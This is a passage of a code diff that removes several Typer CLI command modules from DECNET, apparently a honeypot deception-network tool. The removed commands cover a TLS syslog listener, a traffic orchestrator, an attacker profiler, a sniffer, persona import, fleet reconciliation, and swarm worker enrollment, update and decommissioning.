        json_path: Optional[str] = typer.Option(None, "--json-path", help="Parsed-JSON ingest sink (default: ./master.json)"),
        ca_dir: Optional[str] = typer.Option(None, "--ca-dir", help="DECNET CA dir (default: ~/.decnet/ca)"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
    ) -> None:
        """Run the master-side syslog-over-TLS listener (RFC 5425, mTLS)."""
        from decnet.swarm import pki
        from decnet.swarm.log_listener import ListenerConfig, run_listener

        # Unset (or empty) options fall back to defaults: the packaged CA
        # dir and sink files relative to the current working directory.
        if ca_dir:
            ca_location = pathlib.Path(ca_dir)
        else:
            ca_location = pki.DEFAULT_CA_DIR
        forensic_sink = pathlib.Path(log_path or "master.log")
        json_sink = pathlib.Path(json_path or "master.json")

        cfg = ListenerConfig(
            log_path=forensic_sink,
            json_path=json_sink,
            bind_host=bind_host,
            bind_port=bind_port,
            ca_dir=ca_location,
        )

        if daemon:
            log.info("listener daemonizing host=%s port=%d", bind_host, bind_port)
            _utils._daemonize()

        log.info("listener command invoked host=%s port=%d", bind_host, bind_port)
        console.print(f"[green]Starting DECNET log listener on {bind_host}:{bind_port} (mTLS)...[/]")

        async def _serve() -> None:
            # SIGTERM / SIGINT set the stop event handed to run_listener.
            stop_requested = asyncio.Event()
            running_loop = asyncio.get_running_loop()
            for signum in (signal.SIGTERM, signal.SIGINT):
                try:
                    running_loop.add_signal_handler(signum, stop_requested.set)
                except (NotImplementedError, RuntimeError):  # pragma: no cover
                    # Handler could not be installed; carry on without it.
                    continue
            await run_listener(cfg, stop_event=stop_requested)

        try:
            asyncio.run(_serve())
        except KeyboardInterrupt:
            return
|
||||
@@ -1,55 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the ``orchestrate`` command to *app*."""

    @app.command(name="orchestrate")
    def orchestrate_cmd(
        interval: int = typer.Option(
            60, "--interval", "-i",
            help="Seconds between synthetic activity ticks",
        ),
        daemon: bool = typer.Option(
            False, "--daemon", "-d",
            help="Detach to background as a daemon process",
        ),
        llm: Optional[bool] = typer.Option(
            None, "--llm/--no-llm",
            help=(
                "Enable / disable LLM enrichment of user-class file "
                "bodies. Default reads $DECNET_REALISM_LLM (any "
                "non-empty value enables; 'off' / unset disables)."
            ),
        ),
    ) -> None:
        """Inject synthetic life (inter-decky traffic + file ops + email) into the fleet."""
        import asyncio
        from decnet.orchestrator import orchestrator_worker
        from decnet.web.dependencies import repo

        if daemon:
            log.info("orchestrator daemonizing interval=%d", interval)
            _utils._daemonize()

        # Tri-state flag: None means neither --llm nor --no-llm was passed.
        if llm is None:
            llm_label = "default"
        elif llm:
            llm_label = "on"
        else:
            llm_label = "off"
        log.info("orchestrator starting interval=%d llm=%s", interval, llm_label)
        console.print(
            f"[bold cyan]Orchestrator starting[/] (interval: {interval}s)"
        )

        async def _worker_main() -> None:
            # Initialize the repository before handing it to the worker.
            await repo.initialize()
            await orchestrator_worker(repo, interval=interval, llm_enabled=llm)

        try:
            asyncio.run(_worker_main())
        except KeyboardInterrupt:
            console.print("\n[yellow]Orchestrator stopped.[/]")
|
||||
@@ -1,34 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the ``profiler`` command to *app*."""

    @app.command(name="profiler")
    def profiler_cmd(
        interval: int = typer.Option(30, "--interval", "-i", help="Seconds between profile rebuild cycles"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
    ) -> None:
        """Run the attacker profiler as a standalone microservice."""
        import asyncio
        from decnet.profiler import attacker_profile_worker
        from decnet.web.dependencies import repo

        if daemon:
            log.info("profiler daemonizing interval=%d", interval)
            _utils._daemonize()

        log.info("profiler starting interval=%d", interval)
        console.print(f"[bold cyan]Profiler starting[/] (interval: {interval}s)")

        async def _worker_main() -> None:
            # Initialize the repository before handing it to the worker.
            await repo.initialize()
            await attacker_profile_worker(repo, interval=interval)

        try:
            asyncio.run(_worker_main())
        except KeyboardInterrupt:
            console.print("\n[yellow]Profiler stopped.[/]")
|
||||
@@ -1,111 +0,0 @@
|
||||
"""``decnet realism ...`` — content-engine maintenance commands.
|
||||
|
||||
After stage 5 of the realism migration, this is the only remaining
|
||||
CLI surface from the realism library / former emailgen. ``decnet
|
||||
realism run`` does not exist (the orchestrator runs the unified
|
||||
worker via ``decnet orchestrate``); the only sub-command is
|
||||
``import-personas``, which validates + installs the host-wide global
|
||||
persona pool consumed by fleet (MACVLAN/IPVLAN) and SWARM-shard
|
||||
deckies.
|
||||
|
||||
Topology personas live on ``Topology.email_personas`` and are
|
||||
managed via the dashboard or the topology API; this command does
|
||||
not touch them.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
from pathlib import Path
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Mount the ``realism`` sub-application (and its commands) on *app*."""
    realism_app = typer.Typer(
        name="realism",
        help=(
            "Maintain the realism content engine (persona pool import, "
            "future content-class tuning)."
        ),
    )
    app.add_typer(realism_app, name="realism")

    @realism_app.command("import-personas")
    def realism_import_personas(
        path: Path = typer.Argument(
            ..., exists=True, file_okay=True, dir_okay=False, readable=True,
            help="JSON file containing a list of EmailPersona objects",
        ),
        output: Optional[Path] = typer.Option(
            None, "--output", "-o",
            help=(
                "Override the destination path. Defaults to the canonical "
                "global pool (DECNET_REALISM_PERSONAS, /etc/decnet/"
                "email_personas.json, or ~/.decnet/email_personas.json)."
            ),
        ),
    ) -> None:
        """Validate + install a personas JSON file as the global pool.

        Use this when deploying with IMAP/POP3 services on fleet
        (MACVLAN/IPVLAN) or SWARM-shard mail deckies — those have no
        parent topology row, so they read this host-wide list.
        MazeNET topology mail deckies use ``Topology.email_personas``
        instead and this command does not touch them.
        """
        _require_master_mode("realism import-personas")
        # Imported lazily so the CLI module stays importable without them.
        from decnet.realism import personas_pool as global_pool
        from decnet.realism.personas import parse_personas

        # A file that is not valid UTF-8 raises UnicodeDecodeError (a
        # ValueError, not an OSError); report it like any other read failure.
        try:
            raw = path.read_text(encoding="utf-8")
        except (OSError, UnicodeDecodeError) as exc:
            console.print(f"[red]Cannot read {path}:[/] {exc}")
            raise typer.Exit(code=1) from exc

        try:
            payload = json.loads(raw)
        except json.JSONDecodeError as exc:
            console.print(f"[red]Invalid JSON in {path}:[/] {exc}")
            raise typer.Exit(code=1) from exc
        if not isinstance(payload, list):
            console.print(
                f"[red]{path} must contain a JSON list of personas, "
                f"got {type(payload).__name__}[/]"
            )
            raise typer.Exit(code=1)

        personas = parse_personas(payload)
        if not personas:
            console.print(
                f"[red]No valid personas in {path}.[/] "
                "Check the schema (name, email, role, tone, mannerisms)."
            )
            raise typer.Exit(code=1)
        if len(personas) < 2:
            console.print(
                f"[yellow]Warning: only {len(personas)} valid persona(s) — "
                "the worker requires at least 2 to send mail; importing "
                "anyway in case more are added later.[/]"
            )

        dest = output or global_pool.resolve_path()
        serialized = json.dumps(
            [p.model_dump(exclude_none=False) for p in personas],
            indent=2,
            ensure_ascii=False,
        )
        # The destination may be unwritable (e.g. a root-owned directory);
        # fail with a readable message instead of a traceback.
        try:
            dest.parent.mkdir(parents=True, exist_ok=True)
            dest.write_text(serialized, encoding="utf-8")
        except OSError as exc:
            console.print(f"[red]Cannot write {dest}:[/] {exc}")
            raise typer.Exit(code=1) from exc

        # Called after a successful write so the pool module drops whatever
        # it had cached before.
        global_pool.reset_cache()
        console.print(
            f"[green]Imported {len(personas)} personas to[/] {dest}"
        )
        if path != dest:
            log.info("realism import-personas src=%s dest=%s", path, dest)
|
||||
@@ -1,62 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the ``reconcile`` command to *app*."""

    @app.command(name="reconcile")
    def reconcile_cmd(
        once: bool = typer.Option(
            False,
            "--once",
            help="Run a single reconcile pass and exit (no daemon loop).",
        ),
        interval: int = typer.Option(
            30,
            "--interval",
            "-i",
            help="Seconds between reconcile passes (ignored with --once).",
        ),
        daemon: bool = typer.Option(
            False,
            "--daemon",
            "-d",
            help="Detach to background as a daemon process (long-lived only).",
        ),
    ) -> None:
        """Converge fleet state across decnet-state.json, the DB, and docker."""
        import asyncio

        from decnet.web.dependencies import repo

        if once:
            # One-shot mode: a single pass, print the counters, and leave.
            from decnet.fleet.reconciler import reconcile_once

            async def _single_pass() -> None:
                await repo.initialize()
                tally = await reconcile_once(repo)
                summary = " ".join(
                    f"{field}={tally[field]}"
                    for field in ("inserted", "deleted", "state_updated")
                )
                console.print(f"[bold cyan]reconcile:[/] {summary}")

            asyncio.run(_single_pass())
            return

        # Long-lived mode: optionally detach, then loop until interrupted.
        from decnet.fleet.reconciler_worker import fleet_reconciler_worker

        if daemon:
            log.info("reconciler daemonizing interval=%d", interval)
            _utils._daemonize()

        log.info("reconciler starting interval=%d", interval)
        banner = f"[bold cyan]Fleet reconciler starting[/] (interval: {interval}s)"
        console.print(banner)

        async def _serve() -> None:
            await repo.initialize()
            await fleet_reconciler_worker(repo, interval=interval)

        try:
            asyncio.run(_serve())
        except KeyboardInterrupt:
            console.print("\n[yellow]Reconciler stopped.[/]")
|
||||
@@ -1,31 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.env import DECNET_INGEST_LOG_FILE
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the ``sniffer`` command to *app*."""

    @app.command(name="sniffer")
    def sniffer_cmd(
        log_file: str = typer.Option(
            DECNET_INGEST_LOG_FILE,
            "--log-file",
            "-f",
            help="Path to write captured syslog + JSON records",
        ),
        daemon: bool = typer.Option(
            False,
            "--daemon",
            "-d",
            help="Detach to background as a daemon process",
        ),
    ) -> None:
        """Run the network sniffer as a standalone microservice."""
        import asyncio

        from decnet.sniffer import sniffer_worker

        # Detach first (when asked) so the worker runs in the daemon process.
        if daemon:
            log.info("sniffer daemonizing log_file=%s", log_file)
            _utils._daemonize()

        log.info("sniffer starting log_file=%s", log_file)
        banner = f"[bold cyan]Sniffer starting[/] → {log_file}"
        console.print(banner)

        # Ctrl-C is the expected way to stop a foreground sniffer.
        try:
            asyncio.run(sniffer_worker(log_file))
        except KeyboardInterrupt:
            console.print("\n[yellow]Sniffer stopped.[/]")
|
||||
@@ -1,346 +0,0 @@
|
||||
"""`decnet swarm ...` — master-side operator commands (HTTP to local swarmctl)."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.table import Table
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
swarm_app = typer.Typer(
|
||||
name="swarm",
|
||||
help="Manage swarm workers (enroll, list, decommission). Requires `decnet swarmctl` running.",
|
||||
no_args_is_help=True,
|
||||
)
|
||||
app.add_typer(swarm_app, name="swarm")
|
||||
|
||||
@swarm_app.command("enroll")
def swarm_enroll(
    name: str = typer.Option(..., "--name", help="Short hostname for the worker (also the cert CN)"),
    address: str = typer.Option(..., "--address", help="IP or DNS the master uses to reach the worker"),
    agent_port: int = typer.Option(8765, "--agent-port", help="Worker agent TCP port"),
    sans: Optional[str] = typer.Option(None, "--sans", help="Comma-separated extra SANs for the worker cert"),
    notes: Optional[str] = typer.Option(None, "--notes", help="Free-form operator notes"),
    out_dir: Optional[str] = typer.Option(None, "--out-dir", help="Write the bundle (ca.crt/worker.crt/worker.key) to this dir for scp"),
    updater: bool = typer.Option(False, "--updater", help="Also issue an updater-identity cert (CN=updater@<name>) for the remote self-updater"),
    url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL (default: 127.0.0.1:8770)"),
) -> None:
    """Issue a mTLS bundle for a new worker and register it in the swarm."""
    import os
    import pathlib as _pathlib

    def _write_private_key(dest: _pathlib.Path, pem: str) -> None:
        # Create the file with mode 0600 from the start so the key is never
        # readable by other users, not even between write and chmod.
        fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        with os.fdopen(fd, "w") as fh:
            fh.write(pem)
        # O_CREAT leaves the mode of a pre-existing file untouched, so
        # tighten it explicitly. Still best-effort, but no longer silent.
        try:
            dest.chmod(0o600)
        except OSError as exc:
            console.print(f"[yellow]Could not restrict permissions on {dest}: {exc}[/]")

    # Only send the optional fields the operator actually supplied.
    body: dict = {"name": name, "address": address, "agent_port": agent_port}
    if sans:
        body["sans"] = [s.strip() for s in sans.split(",") if s.strip()]
    if notes:
        body["notes"] = notes
    if updater:
        body["issue_updater_bundle"] = True

    resp = _utils._http_request("POST", _utils._swarmctl_base_url(url) + "/swarm/enroll", json_body=body)
    data = resp.json()

    console.print(f"[green]Enrolled worker:[/] {data['name']} "
                  f"[dim]uuid=[/]{data['host_uuid']} "
                  f"[dim]fingerprint=[/]{data['fingerprint']}")
    updater_bundle = data.get("updater")
    if updater_bundle:
        console.print(f"[green] + updater identity[/] "
                      f"[dim]fingerprint=[/]{updater_bundle['fingerprint']}")

    if not out_dir:
        console.print("[yellow]No --out-dir given — bundle PEMs are in the JSON response; persist them before leaving this shell.[/]")
        return

    target = _pathlib.Path(out_dir).expanduser()
    target.mkdir(parents=True, exist_ok=True)
    (target / "ca.crt").write_text(data["ca_cert_pem"])
    (target / "worker.crt").write_text(data["worker_cert_pem"])
    _write_private_key(target / "worker.key", data["worker_key_pem"])
    console.print(f"[cyan]Agent bundle written to[/] {target}")

    if updater_bundle:
        # The updater identity goes in a sibling "<out-dir>-updater" directory.
        upd_target = target.parent / f"{target.name}-updater"
        upd_target.mkdir(parents=True, exist_ok=True)
        (upd_target / "ca.crt").write_text(data["ca_cert_pem"])
        (upd_target / "updater.crt").write_text(updater_bundle["updater_cert_pem"])
        _write_private_key(upd_target / "updater.key", updater_bundle["updater_key_pem"])
        console.print(f"[cyan]Updater bundle written to[/] {upd_target}")
        console.print("[dim]Ship the agent dir to ~/.decnet/agent/ and the updater dir to ~/.decnet/updater/ on the worker.[/]")
    else:
        console.print("[dim]Ship this directory to the worker at ~/.decnet/agent/ (or wherever `decnet agent --agent-dir` points).[/]")
|
||||
|
||||
@swarm_app.command("list")
def swarm_list(
    host_status: Optional[str] = typer.Option(None, "--status", help="Filter by status (enrolled|active|unreachable|decommissioned)"),
    url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
) -> None:
    """List enrolled workers."""
    from urllib.parse import urlencode

    # URL-encode the filter so a value containing '&', '#' or spaces cannot
    # corrupt the query string.
    query = "?" + urlencode({"host_status": host_status}) if host_status else ""
    resp = _utils._http_request("GET", _utils._swarmctl_base_url(url) + "/swarm/hosts" + query)
    rows = resp.json()
    if not rows:
        console.print("[dim]No workers enrolled.[/]")
        return

    table = Table(title="DECNET swarm workers")
    for col in ("name", "address", "port", "status", "last heartbeat", "enrolled"):
        table.add_column(col)
    for r in rows:
        # Missing or null fields render as an empty cell, or a dash for timestamps.
        table.add_row(
            r.get("name") or "",
            r.get("address") or "",
            str(r.get("agent_port") or ""),
            r.get("status") or "",
            str(r.get("last_heartbeat") or "—"),
            str(r.get("enrolled_at") or "—"),
        )
    console.print(table)
|
||||
|
||||
@swarm_app.command("check")
def swarm_check(
    url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
    json_out: bool = typer.Option(False, "--json", help="Emit JSON instead of a table"),
) -> None:
    """Actively probe every enrolled worker and refresh status + last_heartbeat."""

    def _render_detail(detail) -> str:
        # A dict shows its "status" if truthy, otherwise every key=value pair;
        # None shows a dash; anything else is stringified.
        if isinstance(detail, dict):
            return detail.get("status") or ", ".join(f"{k}={v}" for k, v in detail.items())
        if detail is None:
            return "—"
        return str(detail)

    endpoint = _utils._swarmctl_base_url(url) + "/swarm/check"
    payload = _utils._http_request("POST", endpoint, timeout=60.0).json()
    probes = payload.get("results", [])

    if json_out:
        console.print_json(data=payload)
        return
    if not probes:
        console.print("[dim]No workers enrolled.[/]")
        return

    table = Table(title="DECNET swarm check")
    for heading in ("name", "address", "reachable", "detail"):
        table.add_column(heading)
    for probe in probes:
        if probe.get("reachable"):
            mark = "[green]yes[/]"
        else:
            mark = "[red]no[/]"
        table.add_row(
            probe.get("name") or "",
            probe.get("address") or "",
            mark,
            _render_detail(probe.get("detail")),
        )
    console.print(table)
|
||||
|
||||
@swarm_app.command("update")
def swarm_update(
    host: Optional[str] = typer.Option(None, "--host", help="Target worker (name or UUID). Omit with --all."),
    all_hosts: bool = typer.Option(False, "--all", help="Push to every enrolled worker."),
    include_self: bool = typer.Option(False, "--include-self", help="Also push to each updater's /update-self after a successful agent update."),
    root: Optional[str] = typer.Option(None, "--root", help="Source tree to tar (default: CWD)."),
    exclude: list[str] = typer.Option([], "--exclude", help="Additional exclude glob. Repeatable."),
    updater_port: int = typer.Option(8766, "--updater-port", help="Port the workers' updater listens on."),
    dry_run: bool = typer.Option(False, "--dry-run", help="Build the tarball and print stats; no network."),
    url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL."),
) -> None:
    """Push the current working tree to workers' self-updaters (with auto-rollback on failure)."""
    import asyncio
    import pathlib as _pathlib

    from decnet.swarm.tar_tree import tar_working_tree, detect_git_sha
    from decnet.swarm.updater_client import UpdaterClient

    # Exactly one of --host / --all must be given.
    if not (host or all_hosts):
        console.print("[red]Supply --host <name> or --all.[/]")
        raise typer.Exit(2)
    if host and all_hosts:
        console.print("[red]--host and --all are mutually exclusive.[/]")
        raise typer.Exit(2)

    base = _utils._swarmctl_base_url(url)
    resp = _utils._http_request("GET", base + "/swarm/hosts")
    rows = resp.json()
    if host:
        targets = [r for r in rows if r.get("name") == host or r.get("uuid") == host]
        if not targets:
            console.print(f"[red]No enrolled worker matching '{host}'.[/]")
            raise typer.Exit(1)
    else:
        targets = [r for r in rows if r.get("status") != "decommissioned"]
        if not targets:
            console.print("[dim]No targets.[/]")
            return

    tree_root = _pathlib.Path(root) if root else _pathlib.Path.cwd()
    sha = detect_git_sha(tree_root)
    console.print(f"[dim]Tarring[/] {tree_root} [dim]sha={sha or '(not a git repo)'}[/]")
    tarball = tar_working_tree(tree_root, extra_excludes=exclude)
    console.print(f"[dim]Tarball size:[/] {len(tarball):,} bytes")

    if dry_run:
        console.print("[yellow]--dry-run: not pushing.[/]")
        for t in targets:
            console.print(f" would push to [cyan]{t.get('name')}[/] at {t.get('address')}:{updater_port}")
        return

    async def _push_one(h: dict) -> dict:
        # Push to a single worker. Never raises: any failure is recorded under
        # "error" so one bad host cannot abort the whole gather().
        name = h.get("name") or h.get("uuid")
        out: dict = {"name": name, "address": h.get("address"), "agent": None, "self": None}
        try:
            async with UpdaterClient(h, updater_port=updater_port) as u:
                r = await u.update(tarball, sha=sha)
                out["agent"] = {"status": r.status_code, "body": r.json() if r.content else {}}
                # The updater itself is only refreshed after a successful agent update.
                if r.status_code == 200 and include_self:
                    rs = await u.update_self(tarball, sha=sha)
                    out["self"] = {"status": rs.status_code, "body": rs.json() if rs.content else {}}
        except Exception as exc:  # noqa: BLE001
            out["error"] = f"{type(exc).__name__}: {exc}"
        return out

    async def _push_all() -> list[dict]:
        return await asyncio.gather(*(_push_one(t) for t in targets))

    def _summarize(body: object) -> str:
        # Prefer the released sha, then the error detail. Tolerates a null
        # "release" and a plain-string "detail", neither of which has .get().
        if not isinstance(body, dict):
            return ""
        release = body.get("release")
        if isinstance(release, dict) and release.get("sha"):
            return str(release["sha"])
        detail = body.get("detail")
        if isinstance(detail, dict):
            return str(detail.get("error") or "")
        return str(detail) if detail else ""

    results = asyncio.run(_push_all())

    table = Table(title="DECNET swarm update")
    for col in ("host", "address", "agent", "self", "detail"):
        table.add_column(col)
    any_failure = False
    for r in results:
        agent = r.get("agent") or {}
        selff = r.get("self") or {}
        host_label = str(r.get("name") or "")
        err = r.get("error")
        if err:
            any_failure = True
            table.add_row(host_label, r.get("address") or "", "[red]error[/]", "—", err)
            continue

        a_status = agent.get("status")
        if a_status == 200:
            agent_cell = "[green]updated[/]"
        elif a_status == 409:
            agent_cell = "[yellow]rolled-back[/]"
            any_failure = True
        else:
            agent_cell = f"[red]{a_status}[/]"
            any_failure = True

        if not include_self:
            self_cell = "—"
        elif not selff:
            # No self-update was attempted (the agent update did not succeed).
            self_cell = "[dim]skipped[/]"
        elif selff.get("status") == 200:
            self_cell = "[green]ok[/]"
        else:
            self_cell = f"[red]{selff.get('status')}[/]"
            # A failed updater self-update must fail the command as well.
            any_failure = True

        detail = _summarize(agent.get("body") or {})
        table.add_row(host_label, r.get("address") or "", agent_cell, self_cell, detail[:80])
    console.print(table)

    if any_failure:
        raise typer.Exit(1)
|
||||
|
||||
@swarm_app.command("deckies")
def swarm_deckies(
    host: Optional[str] = typer.Option(None, "--host", help="Filter by worker name or UUID"),
    state: Optional[str] = typer.Option(None, "--state", help="Filter by shard state (pending|running|failed|torn_down)"),
    url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
    json_out: bool = typer.Option(False, "--json", help="Emit JSON instead of a table"),
) -> None:
    """List deployed deckies across the swarm with their owning worker host."""
    from urllib.parse import urlencode

    base = _utils._swarmctl_base_url(url)

    # The deckies endpoint filters by host UUID, so resolve a name (or
    # confirm a UUID) against the host list first.
    host_uuid: Optional[str] = None
    if host:
        resp = _utils._http_request("GET", base + "/swarm/hosts")
        rows = resp.json()
        match = next((r for r in rows if r.get("uuid") == host or r.get("name") == host), None)
        if match is None:
            console.print(f"[red]No enrolled worker matching '{host}'.[/]")
            raise typer.Exit(1)
        host_uuid = match["uuid"]

    # URL-encode the filters so a stray '&', '#' or space cannot corrupt
    # the query string.
    params: dict[str, str] = {}
    if host_uuid:
        params["host_uuid"] = host_uuid
    if state:
        params["state"] = state
    path = "/swarm/deckies" + ("?" + urlencode(params) if params else "")

    resp = _utils._http_request("GET", base + path)
    rows = resp.json()

    if json_out:
        console.print_json(data=rows)
        return

    if not rows:
        console.print("[dim]No deckies deployed.[/]")
        return

    state_styles = {
        "running": "green",
        "failed": "red",
        "pending": "yellow",
        "torn_down": "dim",
    }
    table = Table(title="DECNET swarm deckies")
    for col in ("decky", "host", "address", "state", "services"):
        table.add_column(col)
    for r in rows:
        services = ",".join(r.get("services") or []) or "—"
        state_val = r.get("state") or "pending"
        style = state_styles.get(state_val)
        # Unknown states are shown uncoloured.
        colored = f"[{style}]{state_val}[/]" if style else state_val
        table.add_row(
            r.get("decky_name") or "",
            r.get("host_name") or "<unknown>",
            r.get("host_address") or "",
            colored,
            services,
        )
    console.print(table)
|
||||
|
||||
@swarm_app.command("decommission")
def swarm_decommission(
    name: Optional[str] = typer.Option(None, "--name", help="Worker hostname"),
    uuid: Optional[str] = typer.Option(None, "--uuid", help="Worker UUID (skip lookup)"),
    url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
    yes: bool = typer.Option(False, "--yes", "-y", help="Skip interactive confirmation"),
) -> None:
    """Remove a worker from the swarm (cascades decky shard rows)."""
    from urllib.parse import quote

    if not (name or uuid):
        console.print("[red]Supply --name or --uuid.[/]")
        raise typer.Exit(2)

    base = _utils._swarmctl_base_url(url)
    target_uuid = uuid
    target_name = name
    if target_uuid is None:
        # Only a name was given: look the UUID up in the host list.
        resp = _utils._http_request("GET", base + "/swarm/hosts")
        rows = resp.json()
        match = next((r for r in rows if r.get("name") == name), None)
        if match is None:
            console.print(f"[red]No enrolled worker named '{name}'.[/]")
            raise typer.Exit(1)
        target_uuid = match["uuid"]
        target_name = match.get("name") or target_name

    if not yes:
        # With --uuid alone there is no name to show; do not print "None".
        if target_name:
            prompt = f"Decommission worker {target_name!r} ({target_uuid})?"
        else:
            prompt = f"Decommission worker {target_uuid}?"
        if not typer.confirm(prompt, default=False):
            console.print("[dim]Aborted.[/]")
            raise typer.Exit(0)

    # --uuid is operator input and ends up in the path of a DELETE request:
    # escape it so '/', '?' or '#' cannot redirect the call to another route.
    _utils._http_request("DELETE", f"{base}/swarm/hosts/{quote(str(target_uuid), safe='')}")
    console.print(f"[green]Decommissioned {target_name or target_uuid}.[/]")
|
||||
@@ -1,104 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import signal
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the ``swarmctl`` command to *app*."""

    @app.command()
    def swarmctl(
        port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
        host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
        no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
        tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
        cert: Optional[str] = typer.Option(None, "--cert", help="BYOC: path to TLS server cert (PEM). Auto-issues from the DECNET CA if omitted."),
        key: Optional[str] = typer.Option(None, "--key", help="BYOC: path to TLS server private key (PEM)."),
        client_ca: Optional[str] = typer.Option(None, "--client-ca", help="CA bundle used to verify worker client certs. Defaults to the DECNET CA."),
    ) -> None:
        """Run the DECNET SWARM controller (master-side, separate process from `decnet api`).

        By default, `decnet swarmctl` auto-spawns `decnet listener` as a fully-
        detached sibling process so the master starts accepting forwarder
        connections on 6514 without a second manual invocation. The listener
        survives swarmctl restarts and crashes — if it dies on its own,
        restart it manually with `decnet listener --daemon …`. Pass
        --no-listener to skip.

        Pass ``--tls`` to serve over HTTPS with mutual-TLS enforcement. By
        default the server cert is auto-issued from the DECNET CA under
        ``~/.decnet/swarmctl/`` so enrolled workers (which already ship that
        CA's ``ca.crt``) trust it out of the box. BYOC via ``--cert``/``--key``
        if you need a publicly-trusted or externally-managed cert.
        """
        _require_master_mode("swarmctl")

        # Reject a half-specified BYOC pair up front, before daemonizing or
        # spawning the listener, so the error reaches the terminal and no
        # orphan listener is left behind.
        if tls and bool(cert) != bool(key):
            console.print("[red]--cert and --key must be provided together.[/]")
            raise typer.Exit(code=2)

        if daemon:
            log.info("swarmctl daemonizing host=%s port=%d", host, port)
            _utils._daemonize()

        if not no_listener:
            listener_host = os.environ.get("DECNET_LISTENER_HOST", "0.0.0.0")  # nosec B104
            # Best effort: a failure here (including an unparsable port in
            # the environment) skips the listener but still starts swarmctl.
            try:
                listener_port = int(os.environ.get("DECNET_SWARM_SYSLOG_PORT", "6514"))
                lst_argv = [
                    sys.executable, "-m", "decnet", "listener",
                    "--host", listener_host,
                    "--port", str(listener_port),
                    "--daemon",
                ]
                pid = _utils._spawn_detached(lst_argv, _utils._pid_dir() / "listener.pid")
                log.info("swarmctl auto-spawned listener pid=%d bind=%s:%d",
                         pid, listener_host, listener_port)
                console.print(f"[dim]Auto-spawned listener (pid {pid}) on {listener_host}:{listener_port}.[/]")
            except Exception as e:  # noqa: BLE001
                log.warning("swarmctl could not auto-spawn listener: %s", e)
                console.print(f"[yellow]listener auto-spawn skipped: {e}[/]")

        log.info("swarmctl command invoked host=%s port=%d tls=%s", host, port, tls)
        scheme = "https" if tls else "http"
        console.print(f"[green]Starting DECNET SWARM controller on {scheme}://{host}:{port}...[/]")
        _cmd = [sys.executable, "-m", "uvicorn", "decnet.web.swarm_api:app",
                "--host", host, "--port", str(port)]
        if tls:
            from decnet.swarm import pki as _pki
            if cert and key:
                cert_path, key_path = cert, key
            else:
                # Neither given (the mixed case was rejected above): issue a cert.
                auto_cert, auto_key, _auto_ca = _pki.ensure_swarmctl_cert(host)
                cert_path, key_path = str(auto_cert), str(auto_key)
                console.print(f"[dim]Auto-issued swarmctl server cert → {cert_path}[/]")
            ca_path = client_ca or str(_pki.DEFAULT_CA_DIR / "ca.crt")
            _cmd += [
                "--ssl-keyfile", key_path,
                "--ssl-certfile", cert_path,
                "--ssl-ca-certs", ca_path,
                # 2 == ssl.CERT_REQUIRED: clients must present a valid cert.
                "--ssl-cert-reqs", "2",
            ]

        exit_code = 0
        try:
            # start_new_session gives uvicorn its own process group, so the
            # whole group can be signalled on Ctrl-C.
            proc = subprocess.Popen(_cmd, start_new_session=True)  # nosec B603 B404
            try:
                exit_code = proc.wait()
            except KeyboardInterrupt:
                # Operator-requested stop: SIGTERM, then SIGKILL after 10 s.
                # This path is not treated as a failure.
                exit_code = 0
                try:
                    os.killpg(proc.pid, signal.SIGTERM)
                    try:
                        proc.wait(timeout=10)
                    except subprocess.TimeoutExpired:
                        os.killpg(proc.pid, signal.SIGKILL)
                        proc.wait()
                except ProcessLookupError:
                    # The group is already gone; nothing left to stop.
                    pass
        except (FileNotFoundError, subprocess.SubprocessError) as exc:
            console.print("[red]Failed to start swarmctl. Ensure 'uvicorn' is installed in the current environment.[/]")
            raise typer.Exit(code=1) from exc

        # Surface a crashed controller (e.g. uvicorn missing, port in use)
        # to the caller instead of always exiting 0.
        if exit_code != 0:
            raise typer.Exit(code=1)
|
||||
@@ -1,348 +0,0 @@
|
||||
"""MazeNET topology CLI: generate / deploy / teardown / list / show."""
